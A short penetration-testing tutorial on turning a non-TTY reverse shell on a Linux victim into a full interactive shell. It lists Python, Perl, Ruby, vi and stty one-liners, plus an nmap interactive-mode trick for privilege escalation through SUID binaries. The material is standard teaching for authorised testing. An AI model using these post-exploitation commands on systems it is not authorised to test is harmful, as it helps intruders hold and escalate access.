Shell spawning

Once you get a shell on the linux victim machine this shell could be without TTY (terminal connection) and most likely to go on with the penetration test you will need to spawn TTY shell.

In fact, a shell without the TTY functions does not allow you to perform important things such as the simple “su” command that is used to change user or the “nano” file creation and modification tool. There are other important functions in a penetration test which don’t work on a shell without TTY.

So to spawn a shell in a TTY shell there are some useful commands. These must be run from within the not TTY shell.

Basic commands

The classic command is based on python (obviously python must be installed on the victim):

python -c 'import pty; pty.spawn("/bin/sh")'

or

python3 -c 'import pty; pty.spawn("/bin/sh")'

Other useful commands:

/bin/sh -i
echo os.system('/bin/bash')
perl: exec "/bin/sh";
perl -e 'exec "/bin/sh";'
ruby: exec "/bin/sh"
From “nmap”
nmap --interactive

and then

!sh

Sometimes, if “nmap” is a SUID executable file with perm 4000 (means that whoever runs that file runs it with the same privileges as the owner user), spawn shell from “nmap” can also be useful for privilege escalation. This works only for nmap version <=5.21.

From within “vi” (“vi” is a text editor that works in a not TTY shell)
:!bash

or

:set shell=/bin/bash:shell
Using STTY

“stty” command allows you to change the characteristics of the connection of the terminal to the system. Using, for example, stty with the -a option gets the current configuration:

stty -a

To spawn a shell using “stty” the steps are the following:

In victim machine reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z         

In Attacker console
# echo $TERM
# stty -a
# stty raw -echo
# fg
[enter]
[enter]              

In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
3 3 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments